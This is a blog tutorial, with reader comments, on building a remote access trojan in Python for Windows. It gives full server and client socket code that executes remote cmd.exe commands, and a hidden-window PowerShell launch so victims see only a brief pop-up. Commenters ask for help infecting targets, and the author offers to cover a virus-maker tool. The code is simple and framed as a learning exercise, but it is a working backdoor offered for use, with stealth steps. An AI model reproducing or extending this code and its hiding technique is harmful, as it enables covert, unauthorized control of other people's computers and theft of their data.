How to create a RAT (Remote Access Trojan)
Hello there!
As you probably know I did a post on 7 projects that I consider interesting, you can read more here. Today I will start to post my solutions for these projects. I will try to explain my thought process and share one possible solution. This solution could be changed/improved and I will probably do that 😀 .
Today the project is:
Create a RAT – Remote Access Trojan
This was an amazing project. I’ve never had done something like this before. I had never controlled my own computer from another one, I always wanted to do that. This project allowed me to do some interesting things on my own machine. I did this for Windows target machines but can be easily converted to Linux/MacOS targets. Let’s start!
What is a Remote Access Trojan?
Remote Access Trojan (RAT) is a malware program that introduces a backdoor in a system that allows the attacker to get unauthorized access to the target’s machine to retrieve information or perform several other actions on the machine. This type of programs are usually sent as an email attachment, or in a game. When the user downloads them the system gets compromised allowing the attacker to access the computer remotely. RATs are designed to remain hidden and running in the background to avoid detection. This type of attacks was a common practice in the 90’s. In general this type of attack can be very dangerous. The attacker can get sensitive/private information from the victim, can add a keylogger to the RAT to record key strokes and steal credit card information or passwords, or anything else.
I will not use this software for those purposes, simply for learning, hope you do the same :D. If you choose to use them to arm someone I am not responsible for that.
How to build a RAT (Remote Access Trojan) for Windows machine targets.
For this project I decided to focus on Windows machine targets. In particular Windows 10. It is relatively easy to improve the solution to work on Linux as probably Unix as well. I decided on Windows 10 because it is more widely used and I have it on my machine (I use Linux as the main OS though). Let’s now dive into the steps I took to create my simple Remote Access Trojan.
Step 1
First I read about what is a RAT and once I understood (more or less) what it was I decided to use Python 3 as the language I was going to develop my RAT with. I chose Python 3 because I am comfortable with it, but I am sure it would work with C, Perl, or other languages.
My thought process was simple, I needed to create a server on the target machine and a client on mine. Once I had this I needed someway to run commands on the target machine. For the purpose of this project I decided to simply run cmd.exe commands. It is possible to improve this RAT (Python 3 code) to perform extra operations, I might do that in the future myself.
Step 2
Once I understood what I had to do, and once I had a programming language to code my RAT with it was a matter of start coding. First I create a basic client-server program in Python 3, as such:
The Server:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import socket
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
HOST = "127.0.0.1" #replace by local_ip if you want to use different machines
PORT = 65432
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
conn, addr = s.accept()
with conn:
while True:
data = conn.recv(2048)
msg = data.decode()
if(msg == "exit"):
print("Bye")
break
print("Message received: ",msg)
conn.sendall(data)
The Client:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import socket
HOST = '127.0.0.1'
PORT = 65432
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
while(True):
msg = input("Your command: ")
s.sendall(str.encode(msg))
if(msg == "exit"):
print("Bye")
break
data = s.recv(2048)
print("Received: ", data.decode())
This code of both Server and Client is standard for Socket programming in Python 3. As you can see, in the Server we have on line 10, “with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s“, this line creates a TCP socket (SOCK_STREAM means that the socket is TCP) called “s“. On the following 2 lines, we have s.bind((HOST,PORT)) (line 11) and s.listen() (line 12). In these 2 lines, we have the bind method that simply binds the socket “s” to the HOST and PORT (That were assigned in the lines 6 and 8 respectively), this means that the socket “s” will receive communications on the port 65432, host 127.0.0.1 which, as you probably know is the localhost. The listen method is responsible to wait and listen for incoming communication on the socket. Once communication is received, it is accepted and established in line 13 with the respective client. Afterwards, it is possible to exchange information, in this case we receive information in the server (line 16) and if it is different from “exit” we print it and resend it to the client (line 22).
The Client code is a little easier to understand. We simply create a socket s, like we do in the Server and connect to it on line 7, than it is a matter of sending messages (line 10).
With this code we have an interaction like this one:
Ok, so with this we have the first part, we have a client-server program. The client sends messages to the server that simply prints them to the STDOUT. Now let’s move on to the next step.
Step 3
For this step, we need a way to execute cmd.exe commands with Python 3. To do so I used the Python 3 package: subprocess, as such:
msg = subprocess.check_output(command, shell=True, universal_newlines=True)
This line of code will send the “command” to be executed by the shell and return the output that is stored in the variable msg.
I tested this locally and it works just fine, see the example below with the “dir” command:
Ok, so now it seems we have a way to run simple cmd.exe commands. Let’s now take a look at the code and the final step.
Step 4
The final Python 3 code (that I will be improving and updating on GitHub, stay tuned):
The Server, that is going to run on the targets machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import socket
import subprocess
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
HOST = "127.0.0.1" # replace with local_ip if you do not want to use your localhost, but your real target's IP
print(HOST)
PORT = 65432
def options(command):
msg = "Command output:\n"
msg += subprocess.check_output(command, shell=True, universal_newlines=True)
print(msg)
return msg
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
conn, addr = s.accept()
with conn:
print('Connected by', addr)
while True:
data = conn.recv(1024)
msg = data.decode()
output = options(msg)
if(msg == "exit"):
break
conn.sendall(str.encode(output))
The Client, that is going to run on the attackers machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
import socket
HOST = '127.0.0.1' # The server's hostname or IP address
PORT = 65432 # The port used by the server
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((HOST, PORT))
while(True):
msg = input("Your command: ")
s.sendall(str.encode(msg))
if(msg == "exit"):
break
data = s.recv(2048)
print('Received:\n', data.decode())
As you can see the code is very basic. The ideas was to just be able to exploit the Windows machine to get some information like the name of files, the host name, the network configuration, etc. With this code all of that is possible.
Possible Improvements
To improve the RAT, we can, for example, create an .exe from the server.py file, this way it is possible to just run the .exe in the cmd.exe as a script in the background. I tested a few possibilities and I was able to do that, even with the PowerShell.
To create the .exe from the server.py I used PyInstaller. This tool did the trick just fine! To run the script automatically I used a .cmd script and on it what I do is, I launch a PowerShell with the command:
Start-Process "server.exe" -WorkingDirectory ".\dist\server" -WindowStyle "Hidden"
This way, the user will simply see a pop-up of a cmd and than it will just close up again. But, on the background the server will be running it I can access it remotely.
Conclusion
The majority of what I did in this project I knew already. In particular, I had programmed with Python 3 Sockets before. I know cmd.exe basic commands. The one thing that was harder was to automate the script to run on the background. It was a very nice personal challenge, and I enjoyed the project very much. To be honest, I am a little scared on how easy it was to just create a RAT. I believe that Windows Defender and maybe anti-virus will spot this and block it (I sincerely hope so!).
I hope you learned something with this, and please do not use this to attack someone, just learning about it is fun! No need to go rogue! 😀
Keep on reading, learning, hacking and stay curious! Cyber security is a huge world! I still have a lot to explore, this was yet another step in my long learning journey!
If you have any questions or want me to clarify something drop a comment down below and I will reply as soon as possible.
The code of the exploit can be found here.
Thank you very much for reading!
Cheers,
MRegra
References:
[1] – From pranks to APTs: How remote access Trojans became a major security threat, By Andrada Fiscutean
[2] – RAT (remote access Trojan), By TechTarget Contributor
[3] – Socket Programming in Python (Guide), By Nathan Jennings
I was wondering if I could run this off of an http server? if you are familar with repl.it thats what im trying to run it on. Ik this is a year old and I get it if you can’t reply. Thanks!
Hello,
I am not sure if you can run it off of an http server but I can try to further investigate!!
Thank you for your comment, it is never late, I really appreciate your contact.
Cheers,
MRegra
Having a problem with this project Hopefully you can help. This is what my partner has reported.
I downloaded AndroRat from https://alcnet.org/androrat-download/
Installed it on my PC and also installed a port forwarder from. http://download.freedownloadmanager.org/Windows-PC/Router-Port-Forwarding/FREE.html
I then downloaded the APK and installed it on my phone. Followed all the instructions in the AndroRat instructions but couldn’t get it to connect
I also tried ghost but I didn’t get too far on that one
Hello,
Thank you for your comment.
I am not familiarized with AndroRat. You should try to talk with them directly.
I am sorry I could not be of more help.
Have a nice day and once again thanks for commenting!
Cheers,
MRegra
Mregra
Could you please provide the proper download for this project? I am in need of more detailed help.
Thanks!
Hello,
The project code can be found here: https://github.com/MRegra/CTF_Code/tree/main/Security_Projects/RAT_Trojan
If you want me to clarify something just let me know 🙂
Thank you for your interest,
Cheers,
MRegra
Hi….Can you kindly show me how to create a virus using the JPS virus maker tool and infect the target system.
Hi,
I usually just to projects like this for fun. I will try to do such a project as soon as possible and post it here.
Cheers,
MRegra
Hello, pls can I get a private tutorial for this project, thank you.
Hello,
Sorry for the delay in the reply, I had some personal issues. Now I am back.
Sure, how can I help you?
Cheers,
MRegra
Hi there, thank you for your sharing. I am trying to convert my old laptop as a security camera because it is currently located in a room in front of the entrance door. I would like to be able to turn on the build-in camera and see anything happened at home when I am travelling. I don’t want to install any third party software in my computer which I have no idea what coding embedded. Does your RAT project meets my project goal too?
Many thanks
Hello, it might work for you a similar project. However, you do not need a RAT you just need some software that enables the camera and allows you to see it’s film remotely. There are plenty software options like that, for instance: https://geekflare.com/convert-webcam-into-security-camera/
In this post you can find 8 ways to turn your laptop into a surveillance system. Give it a try and tell me if it worked. Cheers 🙂
how do i make all these rat scripts into a file so i can use it on myself for educational purposes
Hello Brady,
Do make a rat for educational purposes you can follow the steps I highlight here.
The rat I designed is nothing more than a server (coded in python in this case) running on the target’s machine that communicates with your own client.
The principal behind a rat is this because it will give you to communicate with the server without revealing your IP and it will allow you to perform all the operations you previously developed on the server.
Let me know if it was clear or if I have to explain better.
Cheers,
MRegra
are all of the steps in the same file or are they all different files compiled into a folder
Hello wadiyatalkinabeet,
In my example I only used one file, for simplicity, but you can do it with multiple files and then compile the python code into one file.
Both work, it is a matter of choice.
Cheers,
MRegra
I cant figure out what to do with the ip and ports in order for it to be sent across machines
Hello,
What you need to do is to create a connection from the target machine (a server) and then connect to it from your attacker’s machine.
To do so you can use sockets for example: https://realpython.com/python-sockets/
Meaning, the idea is that you have the target’s IP address, and you also have the port in which the server you injected is running on, and you simply create a connection to it, an example is: https://realpython.com/python-sockets/#echo-client
Is the one that says “Echo Client”.
I hope this clarified,
If you have further questions, please let us know.
Cheers,
SoBatista